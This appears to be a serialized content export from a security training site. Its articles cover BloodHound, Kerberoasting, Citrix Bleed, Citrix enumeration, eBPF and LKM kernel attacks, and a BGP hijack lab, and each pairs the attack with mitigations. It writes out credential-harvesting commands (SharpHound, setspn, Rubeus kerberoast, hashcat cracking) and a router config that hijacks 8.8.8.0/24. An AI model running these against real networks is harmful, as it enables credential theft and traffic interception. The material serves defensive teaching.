[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"search-docs":3,"page-\u002Flinux\u002Fkernel-hardening":1816},[4,190,378,497,661,728,822,990,1072,1249,1318,1433,1625],{"id":5,"title":6,"author":7,"body":8,"category":176,"date":177,"description":178,"difficulty":179,"extension":180,"icon":181,"meta":182,"navigation":183,"path":184,"readTime":185,"seo":186,"stem":187,"tags":188,"__hash__":189},"content\u002Factive-directory\u002Fbloodhound-analysis.md","BloodHound: Strategic Path Analysis","PopDocs Team",{"type":9,"value":10,"toc":162},"minimark",[11,16,20,25,28,60,64,69,72,88,92,95,105,109,113,120,124,127,131,134,143,158],[12,13,15],"h1",{"id":14},"strategic-path-analysis-with-bloodhound","Strategic Path Analysis with BloodHound",[17,18,19],"p",{},"BloodHound is an indispensable tool for any security professional dealing with Active Directory. By utilizing graph theory, it reveals the hidden relationships and permissions that can be chained together to achieve Domain Admin status.",[21,22,24],"h2",{"id":23},"the-power-of-graph-theory","The Power of Graph Theory",[17,26,27],{},"In a modern AD environment, traditional list-based audits are insufficient. BloodHound maps:",[29,30,31,39,54],"ul",{},[32,33,34,38],"li",{},[35,36,37],"strong",{},"Group Memberships",": Who is actually in that \"Highly Privileged\" group?",[32,40,41,44,45,49,50,53],{},[35,42,43],{},"ACLs",": Who has ",[46,47,48],"code",{},"GenericAll"," or ",[46,51,52],{},"WriteDacl"," over a sensitive object?",[32,55,56,59],{},[35,57,58],{},"User Sessions",": Where are Domain Admins logged in?",[21,61,63],{"id":62},"operational-workflow","Operational Workflow",[65,66,68],"h3",{"id":67},"_1-data-collection-sharphound","1. Data Collection (SharpHound)",[17,70,71],{},"The first step is gathering the raw data using the ingestor, SharpHound.",[73,74,79],"pre",{"className":75,"code":76,"language":77,"meta":78,"style":78},"language-powershell shiki shiki-themes material-theme-lighter material-theme material-theme-palenight",".\\SharpHound.exe -c All --ZipFileName lab_collection.zip\n","powershell","",[46,80,81],{"__ignoreMap":78},[82,83,86],"span",{"class":84,"line":85},"line",1,[82,87,76],{},[65,89,91],{"id":90},"_2-ingestion-analysis","2. Ingestion & Analysis",[17,93,94],{},"Once the ZIP is uploaded to the BloodHound interface (powered by Neo4j), we can begin running queries.",[96,97,98],"red-team-insight",{},[17,99,100,101,104],{},"Always look for ",[35,102,103],{},"\"Shortest Paths to Domain Admin\"",". This is the most common starting point for identifying critical vulnerabilities. It often reveals paths that span multiple trust boundaries and nested group memberships that are invisible to manual audits.",[21,106,108],{"id":107},"critical-relationship-chains","Critical Relationship Chains",[65,110,112],{"id":111},"the-gpo-link","The GPO Link",[17,114,115,116,119],{},"If a compromised user has ",[46,117,118],{},"GenericWrite"," over a GPO that is applied to an OU containing a Domain Controller, the game is over.",[65,121,123],{"id":122},"the-nested-group-trap","The Nested Group Trap",[17,125,126],{},"Many organizations suffer from \"Group Nesting Hell\". BloodHound excels at visualizing these recursive memberships that humans often miss.",[21,128,130],{"id":129},"defensive-mitigation","Defensive Mitigation",[17,132,133],{},"To combat BloodHound-assisted attacks, defenders should:",[135,136,137],"defense-callout",{},[17,138,139,142],{},[35,140,141],{},"Tiered Administration"," is the most effective mitigation. Ensure highly privileged accounts never log in to lower-tier systems (Tier 1 or Tier 2). By enforcing strict tiering, you prevent the credential theft that BloodHound is designed to identify and exploit.",[144,145,146,152],"ol",{},[32,147,148,151],{},[35,149,150],{},"Clean up ACLs",": Regularly audit and prune excessive permissions on AD objects.",[32,153,154,157],{},[35,155,156],{},"Monitor Ingestion",": Look for mass LDAP queries and session enumeration patterns.",[159,160,161],"style",{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":78,"searchDepth":163,"depth":163,"links":164},2,[165,166,171,175],{"id":23,"depth":163,"text":24},{"id":62,"depth":163,"text":63,"children":167},[168,170],{"id":67,"depth":169,"text":68},3,{"id":90,"depth":169,"text":91},{"id":107,"depth":163,"text":108,"children":172},[173,174],{"id":111,"depth":169,"text":112},{"id":122,"depth":169,"text":123},{"id":129,"depth":163,"text":130},"active-directory","2026-05-10","Mastering the art of relational data analysis to identify hidden attack paths in complex Active Directory environments.","Intermediate","md","i-heroicons-share",{},true,"\u002Factive-directory\u002Fbloodhound-analysis","12 MIN",{"title":6,"description":178},"active-directory\u002Fbloodhound-analysis",null,"9S3nxgzBcyYkQ229nwpvM_ZsCxYXzQY7Nj2GzDhpEe4",{"id":191,"title":192,"author":193,"body":194,"category":364,"date":365,"description":366,"difficulty":179,"extension":180,"icon":367,"meta":368,"navigation":183,"path":369,"readTime":188,"seo":370,"stem":371,"tags":372,"__hash__":377},"content\u002Factive-directory\u002Fkerberoasting.md","Kerberoasting: Exploiting Service Accounts","PopDocs Crew",{"type":9,"value":195,"toc":355},[196,199,202,206,233,237,241,248,257,261,276,280,283,303,306,328,332,352],[12,197,192],{"id":198},"kerberoasting-exploiting-service-accounts",[17,200,201],{},"Kerberoasting is one of the most effective techniques for gathering credentials in an Active Directory environment without sending any traffic to the target service.",[21,203,205],{"id":204},"how-it-works","How it Works",[144,207,208,214,220],{},[32,209,210,213],{},[35,211,212],{},"SPN Discovery",": An attacker queries AD for user accounts that have a Service Principal Name (SPN) set.",[32,215,216,219],{},[35,217,218],{},"TGS Request",": The attacker requests a Kerberos service ticket (TGS) for those SPNs. Because any user can request a ticket for any service, no special privileges are needed.",[32,221,222,225,226,49,229,232],{},[35,223,224],{},"Offline Cracking",": The TGS is encrypted with the service account's NTLM hash. The attacker extracts the ticket from memory and cracks it offline using ",[46,227,228],{},"hashcat",[46,230,231],{},"John the Ripper",".",[21,234,236],{"id":235},"attack-path","Attack Path",[65,238,240],{"id":239},"_1-enumerate-spns","1. Enumerate SPNs",[17,242,243,244,247],{},"Using PowerView or built-in ",[46,245,246],{},"setspn",":",[73,249,251],{"className":75,"code":250,"language":77,"meta":78,"style":78},"setspn -T YOURDOMAIN -Q *\u002F*\n",[46,252,253],{"__ignoreMap":78},[82,254,255],{"class":84,"line":85},[82,256,250],{},[65,258,260],{"id":259},"_2-request-tickets","2. Request Tickets",[73,262,264],{"className":75,"code":263,"language":77,"meta":78,"style":78},"Add-Type -AssemblyName System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"MSSQLSvc\u002Fdb01.domain.local:1433\"\n",[46,265,266,271],{"__ignoreMap":78},[82,267,268],{"class":84,"line":85},[82,269,270],{},"Add-Type -AssemblyName System.IdentityModel\n",[82,272,273],{"class":84,"line":163},[82,274,275],{},"New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"MSSQLSvc\u002Fdb01.domain.local:1433\"\n",[65,277,279],{"id":278},"_3-extract-and-crack","3. Extract and Crack",[17,281,282],{},"Use Mimikatz or Rubeus to export the tickets:",[73,284,288],{"className":285,"code":286,"language":287,"meta":78,"style":78},"language-bash shiki shiki-themes material-theme-lighter material-theme material-theme-palenight","Rubeus.exe kerberoast \u002Foutfile:hashes.txt\n","bash",[46,289,290],{"__ignoreMap":78},[82,291,292,296,300],{"class":84,"line":85},[82,293,295],{"class":294},"sBMFI","Rubeus.exe",[82,297,299],{"class":298},"sfazB"," kerberoast",[82,301,302],{"class":298}," \u002Foutfile:hashes.txt\n",[17,304,305],{},"Cracking with Hashcat (Mode 13100):",[73,307,309],{"className":285,"code":308,"language":287,"meta":78,"style":78},"hashcat -m 13100 hashes.txt wordlist.txt\n",[46,310,311],{"__ignoreMap":78},[82,312,313,315,318,322,325],{"class":84,"line":85},[82,314,228],{"class":294},[82,316,317],{"class":298}," -m",[82,319,321],{"class":320},"sbssI"," 13100",[82,323,324],{"class":298}," hashes.txt",[82,326,327],{"class":298}," wordlist.txt\n",[21,329,331],{"id":330},"mitigation","Mitigation",[29,333,334,340,346],{},[32,335,336,339],{},[35,337,338],{},"Strong Passwords",": Ensure service account passwords are 25+ characters.",[32,341,342,345],{},[35,343,344],{},"Managed Service Accounts (gMSA)",": Use gMSAs where Windows manages the complex password rotation automatically.",[32,347,348,351],{},[35,349,350],{},"Monitoring",": Alert on an unusual number of TGS requests with RC4 encryption.",[159,353,354],{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sBMFI, html code.shiki .sBMFI{--shiki-light:#E2931D;--shiki-default:#FFCB6B;--shiki-dark:#FFCB6B}html pre.shiki code .sfazB, html code.shiki .sfazB{--shiki-light:#91B859;--shiki-default:#C3E88D;--shiki-dark:#C3E88D}html pre.shiki code .sbssI, html code.shiki .sbssI{--shiki-light:#F76D47;--shiki-default:#F78C6C;--shiki-dark:#F78C6C}",{"title":78,"searchDepth":163,"depth":163,"links":356},[357,358,363],{"id":204,"depth":163,"text":205},{"id":235,"depth":163,"text":236,"children":359},[360,361,362],{"id":239,"depth":169,"text":240},{"id":259,"depth":169,"text":260},{"id":278,"depth":169,"text":279},{"id":330,"depth":163,"text":331},"Active Directory","2024-05-21","A deep dive into Kerberoasting techniques to crack service account passwords in Active Directory.","i-heroicons-users",{},"\u002Factive-directory\u002Fkerberoasting",{"title":192,"description":366},"active-directory\u002Fkerberoasting",[373,374,375,376],"AD","Kerberos","Privesc","Lateral Movement","qM-7K-5iuPgzcRC0qk090sBE2B5MggyqTAZsQyVZ92k",{"id":379,"title":380,"author":193,"body":381,"category":483,"date":484,"description":485,"difficulty":486,"extension":180,"icon":487,"meta":488,"navigation":183,"path":489,"readTime":188,"seo":490,"stem":491,"tags":492,"__hash__":496},"content\u002Fcitrix\u002Fcitrix-bleed.md","Citrix Bleed: Bypassing MFA & Session Hijacking",{"type":9,"value":382,"toc":477},[383,387,390,394,401,411,415,435,439,442,453,457],[12,384,386],{"id":385},"citrix-bleed-cve-2023-4966","Citrix Bleed (CVE-2023-4966)",[17,388,389],{},"Citrix Bleed is a critical information disclosure vulnerability in Citrix NetScaler ADC and Gateway that allows attackers to leak session tokens, bypassing Multi-Factor Authentication (MFA).",[21,391,393],{"id":392},"the-vulnerability","The Vulnerability",[17,395,396,397,400],{},"The vulnerability exists in the way NetScaler handles OAuth requests. By sending a specially crafted request to the ",[46,398,399],{},"\u002Foauth\u002Fidp\u002F.well-known\u002Fopenid-configuration"," endpoint, an attacker can trigger an out-of-bounds read.",[17,402,403,404,49,407,410],{},"The response includes the contents of memory, which often contains valid session cookies (",[46,405,406],{},"NSC_AAAC",[46,408,409],{},"NSC_TMAS",").",[21,412,414],{"id":413},"exploit-workflow","Exploit Workflow",[144,416,417,423,429],{},[32,418,419,422],{},[35,420,421],{},"Discovery",": Identify exposed Citrix Gateway instances.",[32,424,425,428],{},[35,426,427],{},"Token Leak",": Send the malicious request and parse the response for session cookies.",[32,430,431,434],{},[35,432,433],{},"Session Replay",": Inject the hijacked cookie into a browser and navigate to the Citrix home page. No password or MFA is required.",[21,436,438],{"id":437},"post-exploitation","Post-Exploitation",[17,440,441],{},"Attackers often use this initial access to:",[29,443,444,447,450],{},[32,445,446],{},"Enumerate VDI environments.",[32,448,449],{},"Launch lateral movement within the corporate network.",[32,451,452],{},"Deploy ransomware or exfiltrate data.",[21,454,456],{"id":455},"remediation","Remediation",[144,458,459,465,471],{},[32,460,461,464],{},[35,462,463],{},"Patch Immediately",": Apply the security updates provided by Citrix.",[32,466,467,470],{},[35,468,469],{},"Terminate Sessions",": Patching alone is NOT enough. You MUST terminate all active and persistent sessions to invalidate existing leaked tokens.",[32,472,473,476],{},[35,474,475],{},"Rotate Secrets",": Rotate any secrets or certificates that might have been exposed in memory.",{"title":78,"searchDepth":163,"depth":163,"links":478},[479,480,481,482],{"id":392,"depth":163,"text":393},{"id":413,"depth":163,"text":414},{"id":437,"depth":163,"text":438},{"id":455,"depth":163,"text":456},"Citrix","2024-05-23","Analyzing the Citrix Bleed (CVE-2023-4966) vulnerability in NetScaler ADC and Gateway.","Advanced","i-heroicons-cloud",{},"\u002Fcitrix\u002Fcitrix-bleed",{"title":380,"description":485},"citrix\u002Fcitrix-bleed",[483,493,494,495],"CVE-2023-4966","Exploit","Session Hijacking","A6IouyAJx9H6Z5xs5QgT2BBB-tXpLQQyLQHhfNKyXEc",{"id":498,"title":499,"author":7,"body":500,"category":650,"date":651,"description":652,"difficulty":653,"extension":180,"icon":654,"meta":655,"navigation":183,"path":656,"readTime":657,"seo":658,"stem":659,"tags":188,"__hash__":660},"content\u002Fcitrix\u002Fcitrix-workspace-enumeration.md","Citrix Workspace Enumeration",{"type":9,"value":501,"toc":639},[502,505,508,512,515,527,531,534,538,541,578,582,586,589,593,600,609,613,616,636],[12,503,499],{"id":504},"citrix-workspace-enumeration",[17,506,507],{},"Citrix environments are often the primary gateway for remote employees. Understanding how to enumerate these services is crucial for both attackers and defenders.",[21,509,511],{"id":510},"discovering-the-portal","Discovering the Portal",[17,513,514],{},"The first step is identifying the Citrix Gateway or StoreFront URL. Common paths include:",[29,516,517,522],{},[32,518,519],{},[46,520,521],{},"\u002FCitrix\u002FStoreWeb\u002F",[32,523,524],{},[46,525,526],{},"\u002Fvpn\u002Findex.html",[21,528,530],{"id":529},"mapping-published-applications","Mapping Published Applications",[17,532,533],{},"Once authenticated (or sometimes even before), we can identify which applications are available to the current user context.",[65,535,537],{"id":536},"xml-service-enumeration","XML Service Enumeration",[17,539,540],{},"The Citrix XML Service often provides detailed information about the farm configuration.",[73,542,544],{"className":285,"code":543,"language":287,"meta":78,"style":78},"# Example query using a common tool\npython3 citrix_enum.py -t https:\u002F\u002Fgateway.lab.local -u user1 -p Password123\n",[46,545,546,552],{"__ignoreMap":78},[82,547,548],{"class":84,"line":85},[82,549,551],{"class":550},"sHwdD","# Example query using a common tool\n",[82,553,554,557,560,563,566,569,572,575],{"class":84,"line":163},[82,555,556],{"class":294},"python3",[82,558,559],{"class":298}," citrix_enum.py",[82,561,562],{"class":298}," -t",[82,564,565],{"class":298}," https:\u002F\u002Fgateway.lab.local",[82,567,568],{"class":298}," -u",[82,570,571],{"class":298}," user1",[82,573,574],{"class":298}," -p",[82,576,577],{"class":298}," Password123\n",[21,579,581],{"id":580},"common-misconfigurations","Common Misconfigurations",[65,583,585],{"id":584},"_1-anonymous-access","1. Anonymous Access",[17,587,588],{},"In some legacy configurations, certain applications might be published with \"Anonymous\" access enabled, allowing anyone to launch them.",[65,590,592],{"id":591},"_2-information-leaks-in-headers","2. Information Leaks in Headers",[17,594,595,596,599],{},"The ",[46,597,598],{},"X-Citrix-Proxy-ID"," and other custom headers can sometimes leak internal IP addresses or server names.",[601,602,603],"blockquote",{},[17,604,605,608],{},[82,606,607],{},"!WARNING","\nInformation disclosure via Citrix headers can provide the internal topography needed to plan lateral movement.",[21,610,612],{"id":611},"strengthening-the-perimeter","Strengthening the Perimeter",[17,614,615],{},"To secure Citrix Workspace:",[29,617,618,624,630],{},[32,619,620,623],{},[35,621,622],{},"Enforce MFA",": Multi-factor authentication should be mandatory for all external access.",[32,625,626,629],{},[35,627,628],{},"Limit Visibility",": Only publish the absolute minimum set of applications required for a user's role.",[32,631,632,635],{},[35,633,634],{},"Regular Patching",": Citrix components are frequent targets for critical vulnerabilities (e.g., CVE-2023-3519).",[159,637,638],{},"html pre.shiki code .sHwdD, html code.shiki .sHwdD{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#546E7A;--shiki-default-font-style:italic;--shiki-dark:#676E95;--shiki-dark-font-style:italic}html pre.shiki code .sBMFI, html code.shiki .sBMFI{--shiki-light:#E2931D;--shiki-default:#FFCB6B;--shiki-dark:#FFCB6B}html pre.shiki code .sfazB, html code.shiki .sfazB{--shiki-light:#91B859;--shiki-default:#C3E88D;--shiki-dark:#C3E88D}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":78,"searchDepth":163,"depth":163,"links":640},[641,642,645,649],{"id":510,"depth":163,"text":511},{"id":529,"depth":163,"text":530,"children":643},[644],{"id":536,"depth":169,"text":537},{"id":580,"depth":163,"text":581,"children":646},[647,648],{"id":584,"depth":169,"text":585},{"id":591,"depth":169,"text":592},{"id":611,"depth":163,"text":612},"citrix","2026-05-08","Techniques for mapping published applications and identifying weak entry points in virtualized environments.","Beginner","i-heroicons-computer-desktop",{},"\u002Fcitrix\u002Fcitrix-workspace-enumeration","8 MIN",{"title":499,"description":652},"citrix\u002Fcitrix-workspace-enumeration","rPAxTCT-PMivMOC3-w3AAoy_zA1AUgVArpCFy_zK4sE",{"id":662,"title":663,"author":664,"body":665,"category":715,"date":716,"description":717,"difficulty":486,"extension":180,"icon":718,"meta":719,"navigation":183,"path":720,"readTime":188,"seo":721,"stem":722,"tags":723,"__hash__":727},"content\u002Flinux\u002Fkernel-exploits.md","Linux Kernel Exploitation: eBPF Case Study","PopDocs Intel",{"type":9,"value":666,"toc":709},[667,671,674,678,681,685,688,692],[12,668,670],{"id":669},"linux-kernel-ebpf-security","Linux Kernel & eBPF Security",[17,672,673],{},"eBPF has revolutionized observability and networking, but it has also introduced a new attack surface for kernel-level privilege escalation.",[21,675,677],{"id":676},"_1-verifier-bypass","1. Verifier Bypass",[17,679,680],{},"The eBPF verifier is responsible for ensuring programs are safe to run. Inconsistencies in pointer arithmetic or boundary checks can lead to arbitrary kernel memory access.",[21,682,684],{"id":683},"_2-local-privilege-escalation-lpe","2. Local Privilege Escalation (LPE)",[17,686,687],{},"By loading a specially crafted eBPF program, a non-privileged user can manipulate kernel structures to gain root shell.",[65,689,691],{"id":690},"hardening-tips","Hardening Tips:",[29,693,694,703],{},[32,695,696,699,700,232],{},[35,697,698],{},"unprivileged_bpf_disabled",": Set ",[46,701,702],{},"sysctl -w kernel.unprivileged_bpf_disabled=1",[32,704,705,708],{},[35,706,707],{},"KASLR",": Kernel Address Space Layout Randomization.",{"title":78,"searchDepth":163,"depth":163,"links":710},[711,712],{"id":676,"depth":163,"text":677},{"id":683,"depth":163,"text":684,"children":713},[714],{"id":690,"depth":169,"text":691},"linux","2026-05-12","Understanding privilege escalation via malicious eBPF programs and verifier bypass.","i-heroicons-cpu-chip",{},"\u002Flinux\u002Fkernel-exploits",{"title":663,"description":717},"linux\u002Fkernel-exploits",[715,724,725,726],"kernel","ebpf","exploitation","Esm8c2-OVH2Guxt81vAYG2qJ5bR61FTWOg-A9zvu_OM",{"id":729,"title":730,"author":664,"body":731,"category":715,"date":812,"description":813,"difficulty":486,"extension":180,"icon":654,"meta":814,"navigation":183,"path":815,"readTime":188,"seo":816,"stem":817,"tags":818,"__hash__":821},"content\u002Flinux\u002Fkernel-hardening.md","Linux Kernel Hardening: LKM Exploitation",{"type":9,"value":732,"toc":807},[733,737,740,744,755,759,762,766,780,804],[12,734,736],{"id":735},"linux-kernel-hardening-and-lkm-security","Linux Kernel Hardening and LKM Security",[17,738,739],{},"Loadable Kernel Modules (LKMs) allow the Linux kernel to be extended at runtime. While powerful, they provide a significant attack surface for rootkits and kernel-level persistence.",[21,741,743],{"id":742},"_1-the-lkm-lifecycle","1. The LKM Lifecycle",[17,745,746,747,750,751,754],{},"Understanding how ",[46,748,749],{},"insmod"," and ",[46,752,753],{},"rmmod"," interact with the kernel symbol table.",[21,756,758],{"id":757},"_2-syscall-hooking","2. Syscall Hooking",[17,760,761],{},"How attackers use LKMs to hijack the system call table to hide processes and files.",[21,763,765],{"id":764},"_3-defense-mechanisms","3. Defense Mechanisms",[29,767,768,774],{},[32,769,770,773],{},[35,771,772],{},"Kernel Module Signing",": Ensuring only trusted modules are loaded.",[32,775,776,779],{},[35,777,778],{},"sysctl Hardening",": Disabling module loading after boot.",[73,781,783],{"className":285,"code":782,"language":287,"meta":78,"style":78},"# Disable module loading\nsysctl -w kernel.modules_disabled=1\n",[46,784,785,790],{"__ignoreMap":78},[82,786,787],{"class":84,"line":85},[82,788,789],{"class":550},"# Disable module loading\n",[82,791,792,795,798,801],{"class":84,"line":163},[82,793,794],{"class":294},"sysctl",[82,796,797],{"class":298}," -w",[82,799,800],{"class":298}," kernel.modules_disabled=",[82,802,803],{"class":320},"1\n",[159,805,806],{},"html pre.shiki code .sHwdD, html code.shiki .sHwdD{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#546E7A;--shiki-default-font-style:italic;--shiki-dark:#676E95;--shiki-dark-font-style:italic}html pre.shiki code .sBMFI, html code.shiki .sBMFI{--shiki-light:#E2931D;--shiki-default:#FFCB6B;--shiki-dark:#FFCB6B}html pre.shiki code .sfazB, html code.shiki .sfazB{--shiki-light:#91B859;--shiki-default:#C3E88D;--shiki-dark:#C3E88D}html pre.shiki code .sbssI, html code.shiki .sbssI{--shiki-light:#F76D47;--shiki-default:#F78C6C;--shiki-dark:#F78C6C}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":78,"searchDepth":163,"depth":163,"links":808},[809,810,811],{"id":742,"depth":163,"text":743},{"id":757,"depth":163,"text":758},{"id":764,"depth":163,"text":765},"2026-05-09","Exploring the security of Loadable Kernel Modules and how to harden the Linux kernel against runtime injection.",{},"\u002Flinux\u002Fkernel-hardening",{"title":730,"description":813},"linux\u002Fkernel-hardening",[715,724,819,820],"lkm","hardening","EzxbOuXIZPjBIe0PQtDkdL97v-910-j88vuWPvTKEVg",{"id":823,"title":824,"author":7,"body":825,"category":979,"date":980,"description":981,"difficulty":982,"extension":180,"icon":983,"meta":984,"navigation":183,"path":985,"readTime":986,"seo":987,"stem":988,"tags":188,"__hash__":989},"content\u002Fnetworking\u002Fbgp-hijacking-simulation.md","BGP Hijacking Simulation",{"type":9,"value":826,"toc":967},[827,830,833,837,840,844,858,862,865,926,930,933,940,944,948,951,955,958,962,965],[12,828,824],{"id":829},"bgp-hijacking-simulation",[17,831,832],{},"Border Gateway Protocol (BGP) is the routing protocol of the internet. It is based on trust, which makes it inherently vulnerable to \"hijacking\"—where an AS (Autonomous System) falsely advertises a prefix it doesn't own.",[21,834,836],{"id":835},"the-trust-problem","The Trust Problem",[17,838,839],{},"BGP was designed in an era where internet participants were few and trusted. An advertisement from a peer is generally accepted as true unless specific filters are in place.",[65,841,843],{"id":842},"types-of-hijacks","Types of Hijacks",[29,845,846,852],{},[32,847,848,851],{},[35,849,850],{},"Exact Prefix Match",": Advertising the exact same prefix as the victim.",[32,853,854,857],{},[35,855,856],{},"Sub-Prefix Match",": Advertising a more specific prefix (e.g., \u002F24 vs \u002F16), which takes precedence in routing decisions.",[21,859,861],{"id":860},"laboratory-simulation-setup","Laboratory Simulation Setup",[17,863,864],{},"In a controlled environment (using GNS3 or FRRouting), we can simulate a hijack.",[73,866,868],{"className":285,"code":867,"language":287,"meta":78,"style":78},"# FRRouting configuration for the attacker\nrouter bgp 65001\n bgp router-id 10.0.0.1\n address-family ipv4 unicast\n  network 8.8.8.0\u002F24  # Hijacking Google's DNS prefix\n exit-address-family\n",[46,869,870,875,886,896,908,920],{"__ignoreMap":78},[82,871,872],{"class":84,"line":85},[82,873,874],{"class":550},"# FRRouting configuration for the attacker\n",[82,876,877,880,883],{"class":84,"line":163},[82,878,879],{"class":294},"router",[82,881,882],{"class":298}," bgp",[82,884,885],{"class":320}," 65001\n",[82,887,888,890,893],{"class":84,"line":169},[82,889,882],{"class":294},[82,891,892],{"class":298}," router-id",[82,894,895],{"class":320}," 10.0.0.1\n",[82,897,899,902,905],{"class":84,"line":898},4,[82,900,901],{"class":294}," address-family",[82,903,904],{"class":298}," ipv4",[82,906,907],{"class":298}," unicast\n",[82,909,911,914,917],{"class":84,"line":910},5,[82,912,913],{"class":294},"  network",[82,915,916],{"class":298}," 8.8.8.0\u002F24",[82,918,919],{"class":550},"  # Hijacking Google's DNS prefix\n",[82,921,923],{"class":84,"line":922},6,[82,924,925],{"class":294}," exit-address-family\n",[21,927,929],{"id":928},"propagation-and-impact","Propagation and Impact",[17,931,932],{},"Once the malicious prefix is advertised, it propagates to adjacent ASes. If the attacker has \"shorter\" paths or more specific routes, traffic for the hijacked prefix will flow to them.",[601,934,935],{},[17,936,937,939],{},[82,938,607],{},"\nBGP hijacking can be used for mass traffic interception, DoS, or even \"black-holing\" entire countries.",[21,941,943],{"id":942},"modern-defenses","Modern Defenses",[65,945,947],{"id":946},"rpki-resource-public-key-infrastructure","RPKI (Resource Public Key Infrastructure)",[17,949,950],{},"RPKI allows ASes to cryptographically sign their prefix advertisements. Peers can then verify the ROA (Route Origin Authorization).",[65,952,954],{"id":953},"bgpsec","BGPsec",[17,956,957],{},"An extension to BGP that provides path validation, ensuring that the entire path of the advertisement is authentic.",[21,959,961],{"id":960},"monitoring-for-hijacks","Monitoring for Hijacks",[17,963,964],{},"Operators should use tools like BGPStream or Cisco's BGP Monitoring Protocol (BMP) to detect anomalous route changes in real-time.",[159,966,806],{},{"title":78,"searchDepth":163,"depth":163,"links":968},[969,972,973,974,978],{"id":835,"depth":163,"text":836,"children":970},[971],{"id":842,"depth":169,"text":843},{"id":860,"depth":163,"text":861},{"id":928,"depth":163,"text":929},{"id":942,"depth":163,"text":943,"children":975},[976,977],{"id":946,"depth":169,"text":947},{"id":953,"depth":169,"text":954},{"id":960,"depth":163,"text":961},"networking","2026-04-28","Understanding the mechanics of Border Gateway Protocol exploitation through laboratory-controlled prefix advertisements.","Expert","i-heroicons-globe-alt",{},"\u002Fnetworking\u002Fbgp-hijacking-simulation","20 